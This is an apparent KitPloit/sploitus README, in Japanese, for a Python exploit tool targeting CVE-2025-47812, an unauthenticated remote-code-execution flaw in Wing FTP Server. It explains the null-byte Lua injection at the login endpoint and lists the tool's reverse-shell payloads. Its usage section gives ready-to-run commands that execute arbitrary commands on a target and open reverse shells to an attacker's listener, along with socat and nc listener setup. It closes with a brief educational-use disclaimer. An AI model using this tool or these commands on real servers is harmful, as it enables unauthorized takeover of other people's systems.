## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HAVBAY-CVE-2025-47812-POC
# CVE-2025-47812 — Wing FTP Server リモートコード実行 (RCE)
  
## 概要
フィールド| 値
---|---
CVE| CVE-2025-47812
影響を受けるバージョン| Wing FTP Server < 7.4.4
タイプ| 認証不要のリモートコード実行
CVSS スコア| 10.0 (緊急)
修正バージョン| Wing FTP Server 7.4.4
### 仕組み
脆弱性は `/loginok.html` ログインエンドポイントに存在します。サーバーは `username` フィールド内の null バイト (`%00`) を適切にサニタイズしません。これにより、攻撃者はセッションファイルに任意の **Lua コード** を注入でき、そのコードは後で `/dir.html` などのエンドポイントにアクセスした際にサーバーサイドで評価されます — 認証は一切不要です。
**参考:** https://nvd.nist.gov/vuln/detail/CVE-2025-47812
* * *
## 機能
* 認証不要のコマンド実行
* 複数のリバースシェルペイロード (socat, bash, python3, nc-e, nc-fifo, php)
* 完全なインタラクティブ TTY のために Socat ペイロードを優先
* 事前のターゲット到達可能性チェック
* 試行ごとに新しいセッションを使用した自動セッション UID 抽出
* `--payload` フラグで特定のペイロードを選択
* `-o` でコマンド出力をファイルに保存
* 設定可能な `--timeout` および `--delay`
* `-v` で詳細/デバッグモード
* `Ctrl+C` の適切なハンドリング
* リバースシェル試行後のペイロードサマリー
* CLI 引数モード + インタラクティブメニュー
* 色分けされた出力
* * *
## 必要条件
root@kitploit:~
pip install requests
* * *
## 使用方法
### インタラクティブモード
root@kitploit:~
python3 wingftp_rce_exploit.py
### CLI モード
root@kitploit:~
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
### 全てのオプション
root@kitploit:~
-u / --url ターゲットのベース URL
-U / --username ログインユーザー名 (デフォルト: anonymous)
-c / --command 実行するコマンド (コマンドモード)
-r / --rhost あなたのリスナー IP (リバースシェルモード)
-p / --rport あなたのリスナーポート (リバースシェルモード)
--payload 使用する特定のペイロード (以下のリストを参照)
--timeout HTTP リクエストタイムアウト (秒) (デフォルト: 10)
--delay ペイロード試行間の遅延 (秒) (デフォルト: 4)
-o / --output コマンド出力をファイルに保存
-v / --verbose デバッグ出力を有効化
* * *
## リバースシェルペイロード
* * *
## 使用例
### コマンド実行
root@kitploit:~
Target URL : http://192.168.1.10:5466
Username : anonymous
選択 : 1
Command : whoami
### リバースシェル
**ステップ 1 — リスナーを起動 (完全な TTY には socat 推奨):**
root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
または nc の場合:
root@kitploit:~
nc -lvnp 4444
**ステップ 2 — エクスプロイトを実行:**
root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
* * *
## クレジット
* 元の PoC 作成者: blindma1den
* 改良・拡張: Havbuy
* * *
## 免責事項
> このツールは**教育目的** および許可されたセキュリティテストのみを対象としています。
> 自分が所有していない、または明示的な書面による許可を得ていないシステムに対しては**使用しないでください** 。
> 不正使用は違法です。作者は誤用に対する一切の責任を負いません。